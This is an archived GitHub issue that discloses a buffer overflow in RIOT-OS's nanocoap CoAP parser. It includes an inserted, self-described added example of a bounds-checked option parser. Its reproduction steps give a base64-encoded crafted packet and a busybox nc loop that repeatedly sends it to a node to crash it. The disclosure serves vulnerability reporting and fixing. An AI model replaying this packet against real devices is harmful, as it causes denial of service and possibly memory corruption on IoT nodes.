[riot-notifications] [RIOT-OS/RIOT] nanocoap: options buffer overflow (#10753)

nmeum notifications at github.com
Fri Jan 11 10:11:01 CET 2019


#### Description

nanocoap contains a buffer overflow which has been introduced with
commit dee793d29f09bafa83bb2c9fe293eb7b16fc009a. The bug allows an
attacker to overflow the `options` buffer in the `coap_pkt_t` supplied
to `coap_parse`.

The relevant code part is the following:

```C
/* optpos points into pkt->options[]; nothing here compares it against
 * NANOCOAP_NOPTS_MAX before the write and the increment. */
if (option_delta) {
    optpos->opt_num = option_nr;
    optpos->offset = (uintptr_t)option_start - (uintptr_t)hdr;
    DEBUG("optpos option_nr=%u %u\n", (unsigned)option_nr, (unsigned)optpos->offset);
    optpos++;
    option_count++;
}
```

`optpos` is a pointer into the `options` buffer of the `coap_pkt_t`. The
pointer is incremented without checking whether it has reached
`NANOCOAP_NOPTS_MAX` (the size of the buffer), and it is also used to
write a new option at the current position in the `options` buffer.
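The following is an added example, not nanocoap code: a reduced CoAP option walker in which the option array is the fixed-size buffer the issue is about. All names (`NOPTS_MAX`, `pkt_t`, `opt_pos_t`, `parse_options`, `decode_ext`) are assumptions, it records every option rather than only those with a non-zero delta, and the sample option bytes are constructed. It shows the bounds check the vulnerable loop lacks: the parser returns an error once `NOPTS_MAX` entries are stored instead of advancing past the end of the array.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not nanocoap code. NOPTS_MAX, pkt_t, opt_pos_t,
 * parse_options and decode_ext are assumed names. */

#define NOPTS_MAX 4  /* stands in for NANOCOAP_NOPTS_MAX */

typedef struct {
    uint16_t opt_num;
    uint16_t offset;   /* byte offset of the option value within buf */
} opt_pos_t;

typedef struct {
    opt_pos_t options[NOPTS_MAX];
    unsigned options_len;
} pkt_t;

/* Decode the extended form of a CoAP option delta or length nibble
 * (RFC 7252, section 3.1). Returns -1 when the packet ends early or the
 * reserved value 15 appears. */
static int decode_ext(const uint8_t **p, const uint8_t *end,
                      unsigned nibble, unsigned *out)
{
    if (nibble < 13) {
        *out = nibble;
    }
    else if (nibble == 13) {
        if (*p >= end) return -1;
        *out = 13 + *(*p)++;
    }
    else if (nibble == 14) {
        if (end - *p < 2) return -1;
        *out = 269 + (((unsigned)(*p)[0] << 8) | (*p)[1]);
        *p += 2;
    }
    else {
        return -1;
    }
    return 0;
}

/* Walk the option bytes that follow the CoAP header and token, up to the
 * 0xff payload marker. Returns the number of options recorded, -1 for a
 * malformed option, or -2 when the packet carries more options than the
 * array can hold; in that case nothing is written past options[]. */
int parse_options(pkt_t *pkt, const uint8_t *buf, size_t len)
{
    const uint8_t *p = buf, *end = buf + len;
    unsigned option_nr = 0;

    pkt->options_len = 0;
    while (p < end && *p != 0xff) {
        unsigned delta, optlen;
        uint8_t b = *p++;

        if (decode_ext(&p, end, b >> 4, &delta) < 0) return -1;
        if (decode_ext(&p, end, b & 0x0f, &optlen) < 0) return -1;
        if ((size_t)(end - p) < optlen) return -1;
        option_nr += delta;

        /* The check the vulnerable loop lacks: stop before the write
         * position runs off the end of options[]. */
        if (pkt->options_len >= NOPTS_MAX) return -2;
        pkt->options[pkt->options_len].opt_num = (uint16_t)option_nr;
        pkt->options[pkt->options_len].offset = (uint16_t)(p - buf);
        pkt->options_len++;
        p += optlen;
    }
    return (int)pkt->options_len;
}

/* Constructed sample option bytes (not captured traffic). */
static const uint8_t SAMPLE_OK[] = { 0xB1, 'a', 0x01, 'b', 0xff, 'p' };  /* Uri-Path "a","b", payload */
static const uint8_t SAMPLE_TOO_MANY[] = { 0x11, 'x', 0x11, 'x', 0x11, 'x',
                                           0x11, 'x', 0x11, 'x' };        /* 5 options > NOPTS_MAX */
static const uint8_t SAMPLE_TRUNCATED[] = { 0x1d };                       /* length nibble 13, no extra byte */

int parse_count(const uint8_t *buf, size_t len)
{
    pkt_t pkt;
    return parse_options(&pkt, buf, len);
}

int parse_opt_num(const uint8_t *buf, size_t len, unsigned idx)
{
    pkt_t pkt;
    if (parse_options(&pkt, buf, len) < 0 || idx >= pkt.options_len) return -1;
    return pkt.options[idx].opt_num;
}

int main(void)
{
    printf("ok: %d, too many: %d, truncated: %d\n",
           parse_count(SAMPLE_OK, sizeof SAMPLE_OK),
           parse_count(SAMPLE_TOO_MANY, sizeof SAMPLE_TOO_MANY),
           parse_count(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED));
    return 0;
}
```

Rejecting the packet is the right reaction for a server with a fixed option table: the parser reports `-2`, the four entries already stored are intact, and the caller can drop the message rather than continue with a partially parsed one.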

To trigger this buffer overflow an attacker can send a CoAP request
containing more than `NANOCOAP_NOPTS_MAX` options to a nanocoap server.
This may allow an attacker to crash the nanocoap server and cause a
denial of service. Additionally, a clever attacker might also be able to
use this for remote code execution.

#### Steps to reproduce the issue

A malicious CoAP packet triggering this vulnerability can be sent to a RIOT
node in order to crash it. I created a malicious packet containing 42 which
should successfully crash native.

To test this, build `examples/nanocoap_server` and send the crafted
malicious packet to it. For example:

```
$ echo QAEJJgEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFw== > crash
$ while sleep 1; do busybox nc -u '[ip-address]' 5683 -e base64 -d crash; done
```

---

I personally prefer full disclosure for reporting such issues. Especially since #10749 hasn't been resolved yet. I also believe that doing full disclosure including documentation of an exploit worked quite well to get #10739 fixed in time. Besides, I didn't want to sit on this any longer and full disclosure is way better than no disclosure at all.

https://github.com/RIOT-OS/RIOT/issues/10753